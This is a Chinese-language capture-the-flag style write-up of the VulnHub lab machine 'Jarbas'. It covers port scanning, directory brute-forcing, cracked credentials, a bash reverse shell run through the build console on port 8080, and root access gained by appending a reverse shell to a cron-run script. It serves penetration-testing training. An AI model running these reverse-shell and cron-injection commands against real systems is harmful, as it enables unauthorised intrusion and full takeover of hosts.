vulnhub - Jarbas

Mar10發表於2024-08-15

vulnhub - Jarbas

資訊收集

image-20240814170213217

sudo nmap -sT -sV -sC -O -p22,80,3306,8080 192.168.157.176

image-20240814170506666

sudo nmap -script=vuln -p22,80,3306,8080 192.168.157.176

image-20240814171222768

有robots.txt

# we don't want robots to click "build" links

8080是後臺登入

目錄掃描

掃一下目錄(不指定-x php,html的話沒掃到)

sudo gobuster dir -u http://192.168.157.176 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html

image-20240814172939527

有/access.html

image-20240815161341538

解完md5得到三個使用者及密碼

tiago:italia99
trindade:marianna
eder:vipsu

其中eder:vipsu可以登入8080的後臺

登入CMS反彈shell

建立專案後翻找可以執行命令的地方

image-20240815162249330

直接彈shell

/bin/bash -i >& /dev/tcp/192.168.157.161/9999 0>&1

儲存後構建即可

image-20240815162526760

沒有許可權

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash

crontab提權

檢視系統定時任務: cat /etc/crontab

發現了一個每五分鐘定期執行的sh指令碼CleaningScript.sh

image-20240815162911790

將反彈Shell的命令寫入指令碼檔案

echo "/bin/bash -i >& /dev/tcp/192.168.157.161/7777 0>&1" >> /etc/script/CleaningScript.sh

等shell就好了

image-20240815163644072